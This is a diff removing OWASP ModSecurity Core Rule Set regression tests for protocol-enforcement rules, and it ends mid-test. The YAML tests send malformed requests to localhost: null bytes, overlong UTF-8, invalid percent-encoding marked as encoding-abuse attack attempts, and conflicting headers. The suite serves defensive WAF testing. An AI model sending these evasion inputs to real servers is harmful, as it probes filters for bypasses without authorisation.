name: "920202.yaml"
description: "Tests for 920202"
tests:
- test_title: 920202-1
desc: This should FAIL with rule 920202 (PL4)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
log_contains: id "920202"

109
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml vendored
View file

@ -1,109 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920210.yaml"
description: "Tests that trigger rule 920210"
tests:
- test_title: 920210-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive"
output:
no_log_contains: "id \"920210\""
- test_title: 920210-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive,keep-alive"
output:
log_contains: "id \"920210\""
- test_title: 920210-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive,close"
output:
log_contains: "id \"920210\""
- test_title: 920210-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "close,close"
output:
log_contains: "id \"920210\""
- test_title: 920210-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "User-Agent"
output:
no_log_contains: "id \"920210\""
- test_title: 920210-6
desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: keep-alive, keep-alive
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920210"
- test_title: 920210-7
desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close, close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920210"

72
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml vendored
View file

@ -1,72 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920220.yaml"
description: "Tests to trigger rule 920220"
tests:
- # This gets a percent but not a number after, invalid
test_title: 920220-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?x=%w20"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""
- # We have a valid percent encoding here
test_title: 920220-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?x=xyz%20%99"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920220\""
- # url encoding includes spaces as plusses, this is valid
test_title: 920220-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=This+is+a+test"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920220\""
- # testURL Encoding Abuse Attack Attempt from old modsec regressions
test_title: 920220-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""
- # testURL Encoding Abuse Attack Attempt from old modsec regressions
test_title: 920220-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%1G"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""

43
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml vendored
View file

@ -1,43 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920230.yaml"
description: "Description"
tests:
- # From old modsec regression tests
test_title: 920230-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920230\""
- # From old modsec regression tests
test_title: 920230-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
no_log_contains: "id \"920230\""

123
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml vendored
View file

@ -1,123 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920240.yaml"
description: "Description"
tests:
- test_title: 920240-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: 11
data: "x=new %w20$"
stop_magic: true
output:
log_contains: "id \"920240\""
- test_title: 920240-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests #FN This should Trigger"
Host: "localhost%00"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: 10
data: "x=new %20$"
stop_magic: true
output:
no_log_contains: "id \"920240\""
- test_title: 920240-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "param=value"
output:
no_log_contains: "id \"920240\""
- # We have a valid percent encoding here
test_title: 920240-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
Content-Type: "text/xml"
data: |
<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">
<SOAP-ENV:Body>
<xkms:StatusRequest xmlns:xkms=\"http://www.w3.org/2002/03/xkms#\" Id=\"_6ee48478-fdd6-4d7d-b1bf-e7b4c3254659\" ResponseId=\"_c1c36b3f-f962-4aea-bfbd-07ed58468c9b\" Service=\"http://www.soapclient.com/xml/xkms2\">
<xkms:ResponseMechanism>http://www.w3.org/2002/03/xkms#Pending</xkms:ResponseMechanism>
<xkms:RespondWith>%1Gwww.attack.org</xkms:RespondWith>
</xkms:StatusRequest>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
output:
no_log_contains: "id \"920240\""
- # test URL Encoding Abuse Attack Attempt from old regression tests
test_title: 920240-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "9"
data: "param=%1G"
stop_magic: true
output:
log_contains: "id \"920240\""
- # test URL Encoding Abuse Attack Attempt from old regression tests
test_title: 920240-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
Content-Type: "application/x-www-form-urlencoded"
data: "param=%7%6F%6D%65%74%65%78%74%5F%31%32%33%"
output:
log_contains: "id \"920240\""

62
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml vendored
View file

@ -1,62 +0,0 @@
---
meta:
author: "csanders-git"
enabled: false
name: "920250.yaml"
description: "Description"
tests:
- # crs-setup.conf needs to have CRS_VALIDATE_UTF8_ENCODING set
# Taken from existing modsec regression
test_title: 920250-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=%c0%af"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920250\""
- # Taken from existing modsec regression
test_title: 920250-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=%c0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920250\""
- # Taken from existing modsec regression
test_title: 920250-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=%F5%80%BF%BF"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920250\""

50
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml vendored
View file

@ -1,50 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920260.yaml"
description: "Description"
tests:
- test_title: 920260-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=%uff0F"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920260\""
- test_title: 920260-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=%u0F"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920260\""
- # Test taken from existing modsec regression
test_title: 920260-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=foo%uFF01"
version: "HTTP/1.0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920260\""

125
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml vendored
View file

@ -1,125 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920270.yaml"
description: "Description"
tests:
- test_title: 920270-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%00=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920270\""
- test_title: 920270-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%00"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920270\""
- test_title: 920270-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%00=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920270\""
- # This causes apache to error before it gets to CRS. Therefore
# we'll mark this as a status 400 now until the FTW OR output is added
test_title: 920270-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost%00"
output:
status: [403, 400]
# log_contains: "id \"920270\""
- test_title: 920270-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Referer: "anything%00"
output:
log_contains: "id \"920270\""
- test_title: 920270-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%40=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920270\""
- test_title: 920270-7
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%FD=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920270\""
- test_title: 920270-8
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%FD=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920270\""
- # Test converted from old tests
test_title: 920270-9
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=foo%00"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920270\""

80
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml vendored
View file

@ -1,80 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920271.yaml"
description: "Description"
tests:
- test_title: 920271-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%127"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920271\""
- test_title: 920271-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%03"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920271\""
- test_title: 920271-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%00=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920271\""
- test_title: 920271-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cookie: hi%13=bye
output:
log_contains: "id \"920271\""
- test_title: 920271-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/%20index.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920271\""
- test_title: 920271-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/%FFindex.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920271\""

68
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml vendored
View file

@ -1,68 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920272.yaml"
description: "Description"
tests:
- test_title: 920272-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%25"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920272\""
- test_title: 920272-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%80"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920272\""
- test_title: 920272-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/index.html?test=t%FFest1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920272\""
- test_title: 920272-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%35"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920272\""
- # This will not trigger with Apache because Apache will block with AH00127
test_title: 920272-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/i%FFndex.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
status: [403, 404]

69
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml vendored
View file

@ -1,69 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920273.yaml"
description: "Description"
tests:
- test_title: 920273-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%20"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920273\""
- # the '&' is one of the only symbol allowed
test_title: 920273-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1&test=t"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920273\""
- test_title: 920273-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/index.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
data: "<hello"
output:
log_contains: "id \"920273\""
- test_title: 920273-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%5FHI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920273\""
- test_title: 920273-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%60HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920273\""

75
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml vendored
View file

@ -1,75 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920274.yaml"
description: "Description"
tests:
- # Apache will just error on this and return 400
# as a result we look for forbidden or 400
# In the future FTW should support OR versus AND output
# https://github.com/CRS-support/ftw/issues/19
test_title: 920274-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost%1F"
output:
status: [200, 403, 400]
# log_contains: "id \"920274\""
- test_title: 920274-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/index.html?test=test1"
headers:
User-Agent: "<ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920274\""
- test_title: 920274-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Test: "ThisISATEST%5F"
output:
no_log_contains: "id \"920274\""
- test_title: 920274-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Test: "ThisIsATest%60"
output:
log_contains: "id \"920274\""
- test_title: 920274-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cookie: "ThisIsATest%60"
output:
no_log_contains: "id \"920274\""

41
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml vendored
View file

@ -1,41 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920280.yaml"
description: "Description"
tests:
- test_title: 920280-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/1.0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
output:
log_contains: "id \"920280\""
- test_title: 920280-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920280\""
- test_title: 920280-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/0.9"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
output:
# Technically valid but Apache doesn't allow 0.9 anymore
status: [400]

21
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml vendored
View file

@ -1,21 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920290.yaml"
description: "Description"
tests:
- # Apache will block this with a 400 and it will
# never get to CRS. We will fix this more when
# FTW supports the OR operator for outputs.
test_title: 920290-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: ""
output:
status: [403, 400]

28
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml vendored
View file

@ -1,28 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 920300.yaml
tests:
- test_title: 920300-1
desc: Request Missing an Accept Header (920300) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.0
data: ''
output:
log_contains: id "920300"

80
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml vendored
View file

@ -1,80 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920310.yaml"
description: "Description"
tests:
- test_title: 920310-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: ""
output:
log_contains: "id \"920310\""
- test_title: 920310-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""
- test_title: 920310-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""
- test_title: 920310-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: lol
Host: "localhost"
Accept: ""
output:
log_contains: "id \"920310\""
- test_title: 920310-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "Business/6.6.1.2 CFNetwork/758.5.3 Darwin/15.6.0"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""
- test_title: 920310-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "Entreprise/6.5.0.177 CFNetwork/758.4.3 Darwin/15.5.0"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""

42
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml vendored
View file

@ -1,42 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920311.yaml"
description: "Description"
tests:
- test_title: 920311-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
Host: "localhost"
Accept: ""
output:
log_contains: "id \"920311\""
- test_title: 920311-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920311\""
- test_title: 920311-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
Accept: "text/plain, text/html"
output:
no_log_contains: "id \"920311\""

28
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml vendored
View file

@ -1,28 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920320.yaml"
description: "Description"
tests:
- test_title: 920320-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
Host: "localhost"
output:
log_contains: "id \"920320\""
- test_title: 920320-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
output:
no_log_contains: "id \"920320\""

29
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml vendored
View file

@ -1,29 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920320.yaml"
description: "Description"
tests:
- test_title: 920330-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: ""
Host: "localhost"
output:
log_contains: "id \"920330\""
- test_title: 920330-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
output:
no_log_contains: "id \"920330\""

34
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml vendored
View file

@ -1,34 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920340.yaml"
description: "Description"
tests:
- test_title: 920340-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Length: "2"
data: "xy"
stop_magic: true
output:
log_contains: "id \"920340\""
- test_title: 920340-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Length: "50"
stop_magic: true
output:
expect_error: true

49
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml vendored
View file

@ -1,49 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920350.yaml"
description: "Description"
tests:
- test_title: 920350-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "127.0.0.1"
protocol: "http"
uri: "/"
output:
log_contains: "id \"920350\""
- test_title: 920350-2
stages:
- stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
output:
no_log_contains: "id \"920350\""
- test_title: 920350-3
stages:
- stage:
